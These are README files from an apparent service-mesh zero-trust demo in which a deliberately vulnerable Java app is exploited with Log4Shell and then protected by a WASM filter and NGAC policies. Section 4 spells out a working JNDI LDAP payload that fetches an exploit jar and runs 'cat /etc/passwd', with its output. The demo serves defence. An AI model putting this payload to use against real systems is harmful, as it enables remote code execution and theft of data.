[http://log4shell:3000/log4shell-exploit-1.0-SNAPSHOT.jar]} {objectclass [javaNamingReference]} {javaFactory [io.tetrate.log4shell.exploit.Log4shellExploit]}]} 73 | vulnerable_1 | /!\ /!\ /!\ You have been pwned! 74 | vulnerable_1 | /!\ /!\ /!\ RCE exploit loaded 75 | vulnerable_1 | /!\ /!\ /!\ Executing: cat /etc/passwd 76 | vulnerable_1 | 77 | vulnerable_1 | root:x:0:0:root:/root:/bin/bash 78 | vulnerable_1 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 79 | vulnerable_1 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 80 | vulnerable_1 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 81 | vulnerable_1 | sync:x:4:65534:sync:/bin:/bin/sync 82 | vulnerable_1 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 83 | vulnerable_1 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 84 | vulnerable_1 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 85 | vulnerable_1 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 86 | vulnerable_1 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 87 | vulnerable_1 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 88 | vulnerable_1 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 89 | vulnerable_1 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 90 | vulnerable_1 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 91 | vulnerable_1 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 92 | vulnerable_1 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 93 | vulnerable_1 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 94 | vulnerable_1 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 95 | vulnerable_1 | systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false 96 | vulnerable_1 | systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false 97 | vulnerable_1 | systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false 98 | vulnerable_1 | systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false 99 | vulnerable_1 | messagebus:x:104:108::/var/run/dbus:/bin/false 100 | vulnerable_1 | 101 | vulnerable_1 | 13:40:09.410 [qtp1316061703-12] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - welcoming user: pwned! 102 | ``` 103 | 104 | **Executing the requests against the Envoy proxy** 105 | 106 | When running the requests through the proxy we can see the access being denied as the traffic is filtered by the WASM plugin. 107 | 108 | ```bash 109 | $ curl http://localhost:8000 110 | Welcome, anonymous! 111 | Accessing: / 112 | 113 | $ curl http://localhost:8000 -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDMyMTY1NTEsImlhdCI6MTY0MzIxMjk1MSwiaXNzIjoidGV0cmF0ZS5pbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6ImFkbWluIn0.KTpoau4cr75ifcvESisRnwJP6_8fxzLrY2MsvgPBITI" 114 | Access Denied 115 | ``` 116 | 117 | ## ZTA demo step by step 118 | 119 | If you want to play with the demo, you can follow the step by step guide in the [DEMO.md](DEMO.md) file. 120 | -------------------------------------------------------------------------------- /ngac/README.md: -------------------------------------------------------------------------------- 1 | # Policy enforcement with NGAC 2 | 3 | In this section we'll see how we can enforce access based on an NGAC graph. We will do 4 | that based on some custom claims that are present in the JWT token of the authenticated user. 5 | 6 | ## Enabling custom claims in Auth0 7 | 8 | Before we begin, we need to configure Auth0 to include additional custom claims 9 | in the issued tokens. we can do that as follows in the Auth0 management console: 10 | 11 | * Go to the User, edit it, and add the following in the `user_metadata` field, then **Save**: 12 | ```json 13 | { 14 | "group": "Engineering" 15 | } 16 | ``` 17 | You can add all information you want, but this example will use the `group` claim. 18 | * Now we have to create an _Action_ that will inject all user metadata as custom claims in the issued tokens. 19 | Go to **Actions > Library**. Click the **Build Custom** button, select the **Login / Post Login**, give it 20 | a name, and **Create**. In the next screen, paste this code snippet and click **Deploy**: 21 | ```javascript 22 | exports.onExecutePostLogin = async (event, api) => { 23 | const namespace = 'https://zta-demo/'; 24 | for (let key in event.user.user_metadata) { 25 | api.idToken.setCustomClaim(namespace + key, event.user.user_metadata[key]); 26 | } 27 | }; 28 | ``` 29 | Once that is done, go to **Actions > Flows**. Select **Login**, drag & drop the custom action you've just 30 | created between the _Login_ and the _Complete_ boxes, and click **Apply**. 31 | 32 | ## Deploy the NGAC enforcer 33 | 34 | Once the user has been configured with additional claims, let's deploy the NGAC enforcer as follows: 35 | 36 | ```bash 37 | $ source ../k8s/variables.env 38 | $ make install 39 | $ kubectl apply -f ../config/ngac-policy.yaml 40 | ``` 41 | 42 | Similar to the OIDC policy, if you inspect [the policy](../config/ngac-policy.yaml) file you'll see 43 | that it applies to the `vulnerable` app and that it uses a `CUSTOM` target that delegates to the 44 | `ngac-grpc` provider. 45 | 46 | ## Group based access control 47 | 48 | Before starting, make sure you logout by going to the `/logout` path so you get a new token with the claims 49 | we just created. 50 | 51 | After deploying the NGAC enforcer, you'll see that you still have access to the application. If 52 | you open the browser and go to the app, you'll see something like: 53 | 54 | ``` 55 | Welcome, Ignasi! 56 | Group: Engineering 57 | Accessing: / 58 | 59 | Authenticated with token: 60 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJodHRwczovL3p0YS1kZW1vL2NvdW50cnkiOiJFUyIsImh0dHBzOi8venRhLWRlbW8vZ3JvdXAiOiJFbmdpbmVlcmluZyIsIm5pY2tuYW1lIjoiaWduYXNpK3Rlc3QiLCJuYW1lIjoiSWduYXNpIiwicGljdHVyZSI6Imh0dHBzOi8vcy5ncmF2YXRhci5jb20vYXZhdGFyLzA0NGMyNTUwOTg0MTYzYzk5NDc3Y2QzZDJiNjQ1ZWI0P3M9NDgwJnI9cGcmZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaWcucG5nIiwidXBkYXRlZF9hdCI6IjIwMjItMDEtMjRUMjE6NDU6MDMuMTE0WiIsImVtYWlsIjoiaWduYXNpK3Rlc3RAdGV0cmF0ZS5pbyIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL25hY3gtZG16LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MWU3ZjQ1YTc2ZGMzYTAwNmFhZTUwZGIiLCJhdWQiOiJkeXlXMG1lNExxOG4zdFkzMEZhdHVEUUZYcHRadm00byIsImlhdCI6MTY0MzA2MTQ2OSwiZXhwIjoxNjQzMDk3NDY5LCJub25jZSI6Ikh4TU43Y2RSbEhFWVlGQlBVNEJMUXY3STdKOE5ZMm92eDVRVUI3ZnVsWFkifQ.iBN9AUedfIo8AuXG3-YbJ8PB1xCR7avV49dBPGDTjkzhh0c_VwXLIJaAqotxXRQJFx7J8sRC_iq6ej4uvHbSnu563GmTazg0Sj1Vuf3uwa81YglJiSfpZNvmfCCMROJtk1ACB7dj54bMPWLXVlA-nqMqp6Q7WJtRGNFesQ9Cra__6T1awvHgq1rlg8hfCDeHpsx3K-D8yoUB1sDxLk3tdVVvJnWm01xM9cNn3Fr51nde6aoNaaijISHZoMkSEb7sNfOVtdqItG3WlHe8LNisGrwuWJF0kiqC_4gfCodF5PAe-3-dRuELGpD4s8hitIs1tGxm-qz6ZfyZWEdL5alfjQ 61 | ``` 62 | 63 | However, if you try to access the `/private` URL, you'll get a `403 Access denied` response. Looking at the 64 | logs of the NGAC enforcer we can see: 65 | 66 | ```bash 67 | $ kubectl logs -n ngac -l app=ngac-authz 68 | 2022/01/24 23:51:28 debug Resolved by: jwt_bearer, Engineering [scope="pep"] 69 | 2022/01/24 23:51:28 debug Resolved by: request_path, /private [scope="pep"] 70 | 2022/01/24 23:51:28 debug Resolved by: method, GET [scope="pep"] 71 | 2022/01/24 23:51:28 debug check(Engineering [GET] -> /private) = false [scope="pep"] 72 | 2022/01/24 23:51:28 debug PC(http) [scope="pdp/audit"] 73 | 2022/01/24 23:51:28 debug deny(access denied) [scope="pep"] 74 | ``` 75 | 76 | It has read the `group` claim value and checked against the [NGAC graph](graph.txt) if the group has 77 | permissions on the requested URI, but access is denied. 78 | 79 | Let's see what happens if the user is moved to the **Admins** group. To do so: 80 | 81 | * Go to the management console in Auth0, and modify the user's **group** claim from Engineering to **Admins** (note that all 82 | the values are case sensitive). 83 | * In the browser, logout again by going to the `/logout` path to go back to the login screen to get a new token. 84 | * Once that is done, login and access the `/private` endpoint again. The request should succeed and you should 85 | see something like: 86 | ``` 87 | Welcome, Ignasi! 88 | Group: Admins 89 | Accessing: /private 90 | 91 | Authenticated with token: 92 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJodHRwczovL3p0YS1kZW1vL2NvdW50cnkiOiJFUyIsImh0dHBzOi8venRhLWRlbW8vZ3JvdXAiOiJBZG1pbnMiLCJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IklnbmFzaSIsInBpY3R1cmUiOiJodHRwczovL3MuZ3JhdmF0YXIuY29tL2F2YXRhci8wNDRjMjU1MDk4NDE2M2M5OTQ3N2NkM2QyYjY0NWViND9zPTQ4MCZyPXBnJmQ9aHR0cHMlM0ElMkYlMkZjZG4uYXV0aDAuY29tJTJGYXZhdGFycyUyRmlnLnBuZyIsInVwZGF0ZWRfYXQiOiIyMDIyLTAxLTI0VDIzOjQyOjQwLjQ0NloiLCJlbWFpbCI6ImlnbmFzaSt0ZXN0QHRldHJhdGUuaW8iLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiaXNzIjoiaHR0cHM6Ly9uYWN4LWRtei5ldS5hdXRoMC5jb20vIiwic3ViIjoiYXV0aDB8NjFlN2Y0NWE3NmRjM2EwMDZhYWU1MGRiIiwiYXVkIjoiZHl5VzBtZTRMcThuM3RZMzBGYXR1RFFGWHB0WnZtNG8iLCJpYXQiOjE2NDMwNjc3NjEsImV4cCI6MTY0MzEwMzc2MSwibm9uY2UiOiJKa096aHNMS181V1JOMFJLSmUxb0d6V3UwVXNqOENCaWhJbkRNbm5zSzVJIn0.lyJ3Z70wj3VjqLOD5CF3yZqOA4kcyogEy_xRG82uMEYKSaQ3eXb71ZRRQtsZyosjycKrEr3-9HKHrLUlsV1NDyooNlFkMPls__Li0MkDg3cpokQ17m1V5B6NCcisN4arJIzYawCb9pbKqnOpOwKrNdt8Um7g2TDMD2ZrsuFpfBva_O_a6Z8JY3f6QDShSazKA51F8URatq4ZydxjxMGw96qa46X6DpKtDR2vFwDb78fu2RGehst_KKWFxzTU7mF5aF_7cVIqwvqxpWsglGIteZqS2B8JA1QSK2pRZOpNER7ciCwftoYx8wgxYJmfEaHfqV4YvmBvqNhV9FbSEwct3A 93 | ``` 94 | 95 | Checking the NGAC enforcer logs we'll see that now it is allowing access: 96 | 97 | ```bash 98 | $ kubectl logs -n ngac -l app=ngac-authz 99 | 2022/01/24 23:50:33 debug Resolved by: jwt_bearer, Admins [scope="pep"] 100 | 2022/01/24 23:50:33 debug Resolved by: request_path, /private [scope="pep"] 101 | 2022/01/24 23:50:33 debug Resolved by: method, GET [scope="pep"] 102 | 2022/01/24 23:50:33 debug check(Admins [GET] -> /private) = true [scope="pep"] 103 | 2022/01/24 23:50:33 debug PC(http) [scope="pdp/audit"] 104 | 2022/01/24 23:50:33 debug Admins-privileged-protected-/private ops=[GET] [scope="pdp/audit"] 105 | 2022/01/24 23:50:33 debug allow() [scope="pep"] 106 | ``` 107 | 108 | ## Environment cleanup 109 | 110 | To cleanup the environment and uninstall the NGAC enforcers, you can use 111 | the following command: 112 | 113 | ```bash 114 | $ make uninstall 115 | ``` 116 | -------------------------------------------------------------------------------- /DEMO.md: -------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications demo 2 | 3 | The following steps show how a Service Mesh can leverage the 4 | features of a Security Kernel suitable for a Zero Trust Architecture 5 | Platform. We will see: 6 | 7 | * How a service mesh leverages **runtime identities** to protect 8 | service-to-service communications. 9 | * How it can enforce **user identity based policies** and integrate with 10 | external or corporate Identity Providers. 11 | * How policy is **enforced at the application level**, not only at the 12 | perimeter. 13 | * How **targeted application policies** can be applied to affect only a subset 14 | of the applications in the mesh. 15 | 16 | The demo consists of a [Java application](vulnerable-app) that is vulnerable to the `Log4Shell` 17 | exploit. We will use the service mesh to enforce that access is authenticated on the 18 | corporate Identity Provider, that only the right users and local services can access 19 | the application, and that malicious payloads that trigger the `Log4Shell` exploit 20 | are rejected. 21 | 22 | ## Install the demo environment 23 | 24 | Before starting, install the demo environment following the instructions 25 | in the [k8s/README.md](k8s/README.md) file. 26 | 27 | ## 1. Access the vulnerable application 28 | 29 | Once you have deployed the demo environment you will be able to access the vulnerable 30 | application at: 31 | 32 | * `https://` - if you used the `gke` mode. 33 | * `https://localhost:8443` - if you used the `local` mode. 34 | 35 | You will see something like this: 36 | 37 | ``` 38 | Welcome, anonymous! 39 | Accessing: / 40 | ``` 41 | 42 | ## 2. Enforce user identities 43 | 44 | We don't want to allow unauthenticated users to access our application, so let's 45 | apply a policy that configures the ingress gateway to require authentication against 46 | the corporate Identity Provider. You can check the [OIDC configuration](k8s/manifests/istio-authservice.yaml) 47 | to see how the different URLs involved in the OpenID Connect protocol are configured. 48 | 49 | ```bash 50 | $ kubectl apply -f config/oidc-policy.yaml 51 | ``` 52 | 53 | If you inspect [the policy](config/oidc-policy.yaml) file you'll see that it applies to the `istio-ingressgateway` 54 | and that it uses a `CUSTOM` target that delegates to the `authservice-grpc` provider. 55 | The provider is configured in The Istio global mesh config that you can check with: 56 | 57 | ```bash 58 | $ kubectl -n istio-system describe configmap istio 59 | ``` 60 | 61 | Once the policy is applied you can refresh the browser and you will be redirected to the 62 | Identity Provider login page. After accepting in the consent screen and logging in, you'll 63 | see something like: 64 | 65 | ``` 66 | Welcome, Ignasi! 67 | Accessing: / 68 | 69 | Authenticated with token: 70 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IklnbmFzaSIsInBpY3R1cmUiOiJodHRwczovL3MuZ3JhdmF0YXIuY29tL2F2YXRhci8wNDRjMjU1MDk4NDE2M2M5OTQ3N2NkM2QyYjY0NWViND9zPTQ4MCZyPXBnJmQ9aHR0cHMlM0ElMkYlMkZjZG4uYXV0aDAuY29tJTJGYXZhdGFycyUyRmlnLnBuZyIsInVwZGF0ZWRfYXQiOiIyMDIyLTAxLTIzVDEwOjQyOjA2Ljg2NVoiLCJlbWFpbCI6ImlnbmFzaSt0ZXN0QHRldHJhdGUuaW8iLCJlbWFpbF92ZXJpZmllZCI6dHJ1ZSwiaXNzIjoiaHR0cHM6Ly9uYWN4LWRtei5ldS5hdXRoMC5jb20vIiwic3ViIjoiYXV0aDB8NjFlN2Y0NWE3NmRjM2EwMDZhYWU1MGRiIiwiYXVkIjoiZHl5VzBtZTRMcThuM3RZMzBGYXR1RFFGWHB0WnZtNG8iLCJpYXQiOjE2NDI5MzQ1MjcsImV4cCI6MTY0Mjk3MDUyNywibm9uY2UiOiJsOUV4dW1EUUZQc3Z4VzJ1YkhSUHpiUDA1aFJuYnQ1dFBKNXJaRXVrSFlvIn0.AUr-S54HmRosQaHLFN99hxj1eP1NyDkk_42Bihlbh5OyQdTba-J_KYwWqUHPYdry8RQmHzYz6moDH3hynV5TRCDP0TNzCc9Y6eYoQmT0U59ZeKL1d38XMmGdTBTbzwMCRKoGf4wyopBPsFsIE2tH4iUMBiL7uKw_0kgjOr2UxJcUQR7bPVyvRSXIanxdrrtSWgpBdibAZ80c-z2V7m9uWJM8Tz_SjVwVm1PiXh_nkptFnWfq-i8J_aMNpDLU_RIn2D4nz_omBLdvSRQYjKyFMUIQZ8Huctpx-bKcBJFHT7l2QFjFMyaB00GKFLbsFCk3EDNeWQ8E8a8nn4fPooabbg 71 | ``` 72 | 73 | ## 3. Enforce runtime access 74 | 75 | Now we have configured our ingress to require an user login. We could have applied this policy 76 | directly to the application sidecar, but for the demo purposes we'll do it just at the ingress level. 77 | 78 | This means that any other service in the cluster could directly reach the application without going through 79 | the ingress. We can check it by launching a new pod and accessing the app as follows: 80 | 81 | ```bash 82 | $ kubectl run tmp-shell --rm -i --tty --image nicolaka/netshoot -- /bin/bash 83 | bash-5.1# curl http://vulnerable.zta-demo:8080 84 | Welcome, anonymous! 85 | Accessing: / 86 | bash-5.1# exit 87 | ``` 88 | 89 | Let's create a runtime policy that enforces that our application can only be reached from the ingress gateway. 90 | Services in the cluster will no longer have direct access to it: 91 | 92 | ```bash 93 | $ kubectl apply -f config/runtime-authn.yaml 94 | ``` 95 | 96 | If you inspect [the contents of the policy](config/runtime-authn.yaml) you'll see that it applies to the `vulnerable` application and that 97 | it only allows access from a specific source principal. That source principal matches the 98 | [SPIFEE identity](https://spiffe.io/docs/latest/spiffe-about/spiffe-concepts/#spiffe-id) of the Istio Ingress Gateway. 99 | 100 | We can now try to directly access the application again from inside the cluster: 101 | 102 | ```bash 103 | $ kubectl run tmp-shell --rm -i --tty --image nicolaka/netshoot -- /bin/bash 104 | bash-5.1# curl http://vulnerable.zta-demo:8080 105 | RBAC: access denied 106 | bash-5.1# exit 107 | ``` 108 | 109 | Now we get an access denied, because the proxy sidecar in the application pod is rejecting the connection since the 110 | runtime identity presented by our workload does not match the configured one. 111 | 112 | ## 4. Targeted application policy 113 | 114 | The deployed Java application is vulnerable to `Log4Shell`, as it uses a Java and `log4j` versions vulnerable to the 115 | popular CVEs. It logs the information in the JWT token without sanitizing it first, so it is easy to trigger it. To 116 | demonstrate the attach, let's inject some malicious payloads in the token by setting some claims in our User profile: 117 | 118 | * In the Auth0 management console, go to **Users Management > Users**. Select your user and **Edit** the **Name** field. 119 | Put the following value and save: `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}` 120 | * In the browser, go to the `/logout` path to go back to the login screen to get a new token. 121 | * Log in again. You'll see a normal output: 122 | ``` 123 | Welcome, ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}! 124 | Accessing: / 125 | 126 | Authenticated with token: 127 | eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkRGRWVyODZqY2lRQTNfUVdETkE3MyJ9.eyJuaWNrbmFtZSI6ImlnbmFzaSt0ZXN0IiwibmFtZSI6IiR7am5kaTpsZGFwOi8vbG9nNHNoZWxsOjEzODkvZXhlYy9ZMkYwSUM5bGRHTXZjR0Z6YzNka0NnPT19IiwicGljdHVyZSI6Imh0dHBzOi8vcy5ncmF2YXRhci5jb20vYXZhdGFyLzA0NGMyNTUwOTg0MTYzYzk5NDc3Y2QzZDJiNjQ1ZWI0P3M9NDgwJnI9cGcmZD1odHRwcyUzQSUyRiUyRmNkbi5hdXRoMC5jb20lMkZhdmF0YXJzJTJGaWcucG5nIiwidXBkYXRlZF9hdCI6IjIwMjItMDEtMjRUMDg6MjM6NDguODY5WiIsImVtYWlsIjoiaWduYXNpK3Rlc3RAdGV0cmF0ZS5pbyIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL25hY3gtZG16LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MWU3ZjQ1YTc2ZGMzYTAwNmFhZTUwZGIiLCJhdWQiOiJkeXlXMG1lNExxOG4zdFkzMEZhdHVEUUZYcHRadm00byIsImlhdCI6MTY0MzAxMjYyOSwiZXhwIjoxNjQzMDQ4NjI5LCJub25jZSI6IlQ5c2Q2LTZsNDlNVGRkUXFOLVJkeEplYmMwS1VsNk1OOVJmRWtkMVZVWjgifQ.FUi8ydGHDksc_B6YfmE-xCmSvdfOtroxJ5MOp5aern-JK3Qrcm0lYo4NNcxRdDg65AbS93hklexBRLBzfTd5B8jopiyzqmznMtafxV9rrH_ZS2-oBrfc-soLQf0r9d8T0tTnnidtfAbPSwNyv5zKiFHXxHGHoX-x6wjZahCt-pKk4uoCdTDGgCp2751yXF1FJSLcC8v8kiSC9lZhm7xJxVFvP19zZ30PadD9b_QOu3Xs-yOz2LxCXCXImQZvfuCV2YFOvVGimfKz35WeEf5RAeJZkxoHN6G3oXnbEwgIAdAl6r68Gj2LUbloy8XvKgJk7IIcsSlAwETiiPWdemP3ag 128 | ``` 129 | * However, if we inspect the application container logs we'll see something like: 130 | ```bash 131 | $ kubectl logs -n zta-demo -l app=vulnerable --tail 30 132 | 133 | 08:23:49.369 [qtp1316061703-14] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - user resolved to: pwned! 134 | 08:23:49.535 [qtp1316061703-16] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - token payload: {"sub":"auth0|61e7f45a76dc3a006aae50db","aud":"dyyW0me4Lq8n3tY30FatuDQFXptZvm4o","email_verified":true,"updated_at":"2022-01-24T08:23:48.869Z","nickname":"ignasi+test","name":"${jndi:ldap:\/\/log4shell:1389\/exec\/Y2F0IC9ldGMvcGFzc3dkCg==}","iss":"https:\/\/nacx-dmz.eu.auth0.com\/","exp":1643048629,"iat":1643012629,"nonce":"T9sd6-6l49MTddQqN-RdxJebc0KUl6MN9RfEkd1VUZ8","picture":"https:\/\/s.gravatar.com\/avatar\/044c2550984163c99477cd3d2b645eb4?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fig.png","email":"ignasi+test@tetrate.io"} 135 | /!\ /!\ /!\ You have been pwned! 136 | /!\ /!\ /!\ RCE exploit loaded 137 | /!\ /!\ /!\ Executing: cat /etc/passwd 138 | 139 | root:x:0:0:root:/root:/bin/bash 140 | daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 141 | bin:x:2:2:bin:/bin:/usr/sbin/nologin 142 | sys:x:3:3:sys:/dev:/usr/sbin/nologin 143 | sync:x:4:65534:sync:/bin:/bin/sync 144 | games:x:5:60:games:/usr/games:/usr/sbin/nologin 145 | man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 146 | lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 147 | mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 148 | news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 149 | uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 150 | proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 151 | www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 152 | backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 153 | list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 154 | irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 155 | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 156 | nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 157 | systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false 158 | systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false 159 | systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false 160 | systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false 161 | messagebus:x:104:108::/var/run/dbus:/bin/false 162 | 163 | 08:23:49.537 [qtp1316061703-16] INFO io.tetrate.log4shell.vulnerable.GreetingsServlet - user resolved to: pwned! 164 | ``` 165 | 166 | At this point, the vulnerable application has processed the malicious `${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}` 167 | payload in the `name` claim of the JWT token, downloaded the exploit from `log4shell:1389`, and executed the `cat /etc/passwd` command 168 | that comes base64-encoded in the payload. 169 | 170 | We can further verify this by inspecting the application sidecar logs. There we can see the application doing an outbound 171 | call to download the exploit that will be executed: 172 | 173 | ```bash 174 | $ kubectl -n zta-demo logs -l app=vulnerable -c istio-proxy | grep log4shell-exploit 175 | [2022-01-27T20:53:01.489Z] "GET /log4shell-exploit-1.0-SNAPSHOT.jar HTTP/1.1" 200 - via_upstream - "-" 0 3555 7 7 "-" "Java/1.8.0_102" "3c262a7d-a429-9665-a441-bf67c64488b3" "log4shell:3000" "10.88.1.75:3000" outbound|3000||log4shell.zta-demo.svc.cluster.local 10.88.0.145:48294 10.92.6.237:3000 10.88.0.145:56238 - default 176 | ``` 177 | 178 | To prevent this, we will deploy the [WASM patch](wasm-patch) to all the Java applications in the environment: 179 | 180 | ```bash 181 | $ envsubst < config/wasm-patch.yaml | kubectl apply -f - 182 | ``` 183 | 184 | The [patch file](config/wasm-patch.yaml) sets the `selectors` so that the patch is deployed only to Java applications, and it instructs 185 | the mesh to apply the WASM filter to every HTTP request. We can now refresh the page and this time we'll see the following: 186 | 187 | ``` 188 | Access Denied 189 | ``` 190 | 191 | We can check that the sidecar proxy in the application pod is rejecting hte traffic via the WASM plugin we just deployed: 192 | 193 | ```bash 194 | $ kubectl -n zta-demo logs -l app=vulnerable -c istio-proxy | grep wasm 195 | 2022-01-24T08:35:18.968121Z info envoy wasm wasm log zta-demo.log4shell-patch: access denied for: ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==} 196 | ``` 197 | 198 | ## 5. (Optional) NGAC policy enforcement 199 | 200 | Now that we have all the primitives we need to implement a Zero Trust Architecture, we can look at how we can 201 | apply more high level access control policies with NGAC. You can follow the steps in the [ngac/README.md](ngac/README.md) 202 | to configure user custom claims and enforce access using an NGAC graph. 203 | --------------------------------------------------------------------------------